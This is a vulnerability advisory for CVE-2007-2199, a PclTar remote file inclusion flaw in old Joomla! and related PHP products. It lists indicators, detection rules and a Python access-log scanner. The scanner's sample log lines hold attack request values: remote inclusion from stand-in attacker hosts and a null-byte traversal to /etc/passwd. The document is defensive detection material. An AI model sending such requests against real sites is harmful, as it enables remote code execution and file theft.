CVE-2007-2199
published 2007-04-24


Priority: P3 51 · Severity: medium, CVSS 2.0 base score 6.8
CVSS 2.0 vector: AV:N/AC:M/Au:N/C:P/I:P/A:P
Exploit: available
EPSS: 46.76% (98.7th percentile)
PHP remote file inclusion vulnerability in lib/pcltar.lib.php (aka pcltar.php) in the PclTar module 1.3 and 1.3.1 for Vincent Blavet PhpConcept Library, as used in multiple products including (1) Joomla! 1.5.0 Beta, (2) N/X Web Content Management System (WCMS) 4.5, (3) CJG EXPLORER PRO 3.3, and (4) phpSiteBackup 0.1, allows remote attackers to execute arbitrary PHP code via a URL in the g_pcltar_lib_dir parameter.

Affected

5 ranges

Vendor            Product           Version range   Fixed in
cjg_explorer_pro  cjg_explorer_pro  <= 3.3
cjg_explorer_pro  cjg_explorer_pro
joomla            joomla
nx                n_x_wcms
phpsitebackup     phpsitebackup

Detection & IOCs (extracted from sources)

path: /libraries/pcl/pcltar.php
path: cep/lib/pcltar.lib.php
path: cep/lib/pcltrace.lib.php
path: /phpSiteBackup-0.1/pcltar.lib.php
filename: pcltar.lib.php
filename: pcltrace.lib.php
  • Detect HTTP requests that carry a 'g_pcltar_lib_dir' parameter whose value is a remote URL; this is the signature of an attempted PHP remote file inclusion against PclTar.
  • Monitor GET requests to pcltar.lib.php or pcltrace.lib.php where g_pcltar_lib_dir is set to an external URL or to a path pointing at attacker-controlled code (e.g., g_pcltar_lib_dir=http:// or g_pcltar_lib_dir=shell). Decode the query string before matching, since the scheme is often URL-encoded (http%3A%2F%2F).
  • In Joomla! 1.5.0 Beta deployments, monitor GET requests to /libraries/pcl/pcltar.php with a g_pcltar_lib_dir parameter containing a URL (e.g., http://hacker/?); the trailing '?' turns the rest of the include path into a query string on the attacker's server.
  • The vulnerable statement builds the include path from the unsanitized variable: include($g_pcltar_lib_dir."/pclerror.lib.php"); alert on any user-controlled value reaching this include call.
  • Exploitation has two preconditions on the target's PHP configuration. First, $g_pcltar_lib_dir is a bare global, not a value read from $_GET, so a request parameter can only populate it when register_globals is enabled. Second, include() will only fetch a URL when remote inclusion is permitted: allow_url_fopen on PHP before 5.2.0, allow_url_include on PHP 5.2.0 and later. With remote inclusion disabled the same parameter still allows local file inclusion via traversal or an absolute path, so detection should not be limited to URL values.
  • The vulnerability affects every product bundling the same PclTar library: Joomla! 1.5.0 Beta, N/X WCMS 4.5, CJG EXPLORER PRO 3.3, and phpSiteBackup 0.1. Detection rules should cover all known vulnerable paths across these products, and any other application shipping lib/pcltar.lib.php should be checked for the same include.
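The detection rules above, turned into code that runs over web-server access-log lines. This is an added example and not tooling from the advisory or from PhpConcept Library; the log lines are constructed, not captured traffic, and the file names and parameter name come from the IOC list above. It matches requests to the three vulnerable file names regardless of directory prefix, URL-decodes the query string (twice, to catch double encoding), and classifies the g_pcltar_lib_dir value as a remote-inclusion attempt (URL or PHP stream wrapper scheme) or a local-inclusion attempt (traversal or absolute path). A bare relative directory name such as the library's own default is deliberately not flagged.

```python
"""Detect CVE-2007-2199 (PclTar g_pcltar_lib_dir inclusion) in access logs.

Added example, not the page's or the project's own code. SAMPLE_LOG is
constructed test data; the attacker hosts and IPs are documentation ranges.
"""
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Vulnerable entry points named in the advisory, matched on file name only
# because each product ships the library under a different directory.
VULN_FILES = ("pcltar.php", "pcltar.lib.php", "pcltrace.lib.php")
PARAM = "g_pcltar_lib_dir"

# Apache/nginx "combined" format; only client IP, timestamp, request
# target and status are extracted.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# Schemes that make include() read code from somewhere other than the
# local library directory (remote hosts or PHP stream wrappers).
REMOTE_SCHEME_RE = re.compile(r'^\s*(?:https?|ftps?|php|data|expect|phar)://', re.I)


def classify_value(value):
    """Verdict for one g_pcltar_lib_dir value: 'rfi', 'lfi' or None."""
    v = unquote(value)  # second decode: parse_qs already did the first
    if REMOTE_SCHEME_RE.match(v):
        return "rfi"
    if "../" in v or "..\\" in v or v.startswith("/"):
        return "lfi"  # traversal or absolute path: local file inclusion
    return None  # plain relative directory name, e.g. the default "lib"


def check_request_target(target):
    """Inspect one request target (path?query); return a hit dict or None."""
    parts = urlsplit(target)
    filename = parts.path.rsplit("/", 1)[-1].lower()
    if filename not in VULN_FILES:
        return None
    qs = parse_qs(parts.query, keep_blank_values=True)
    for raw in qs.get(PARAM, []):
        verdict = classify_value(raw)
        if verdict:
            return {"file": filename, "verdict": verdict, "value": raw}
    return None


def scan_log(lines):
    """Return a list of hits, one per log line that matches the rule."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        hit = check_request_target(m.group("target"))
        if hit:
            hit.update(ip=m.group("ip"), ts=m.group("ts"),
                       status=int(m.group("status")))
            hits.append(hit)
    return hits


# Constructed sample lines (not real traffic).
SAMPLE_LOG = [
    # benign application request, no PclTar parameter at all
    '10.0.0.5 - - [24/Apr/2007:10:00:01 +0000] "GET /index.php?option=com_content HTTP/1.1" 200 5120',
    # RFI against the Joomla! 1.5.0 Beta path, value as in the advisory
    '198.51.100.7 - - [24/Apr/2007:10:00:02 +0000] "GET /libraries/pcl/pcltar.php?g_pcltar_lib_dir=http://hacker/? HTTP/1.1" 200 812',
    # URL-encoded scheme against the N/X WCMS path
    '198.51.100.7 - - [24/Apr/2007:10:00:03 +0000] "GET /cep/lib/pcltrace.lib.php?g_pcltar_lib_dir=http%3A%2F%2F203.0.113.9%2Fc.txt%3F HTTP/1.1" 500 0',
    # traversal variant with a null byte, against the phpSiteBackup path
    '203.0.113.4 - - [24/Apr/2007:10:00:04 +0000] "GET /phpSiteBackup-0.1/pcltar.lib.php?g_pcltar_lib_dir=../../../../etc/passwd%00 HTTP/1.0" 200 300',
    # same file, value is just a local directory name: not flagged
    '10.0.0.6 - - [24/Apr/2007:10:00:05 +0000] "GET /cep/lib/pcltar.lib.php?g_pcltar_lib_dir=lib HTTP/1.1" 200 10',
]

if __name__ == "__main__":
    for h in scan_log(SAMPLE_LOG):
        print(f'{h["ts"]} {h["ip"]} {h["verdict"].upper()} {h["file"]} value={h["value"]!r} status={h["status"]}')
```

Run it as a script to see the three flagged lines, or import it and feed `scan_log` the lines of a real access log. The status code is kept in each hit because a 200 on an RFI attempt against an unpatched host is worth triaging ahead of a 404 from a scanner hitting a path that does not exist.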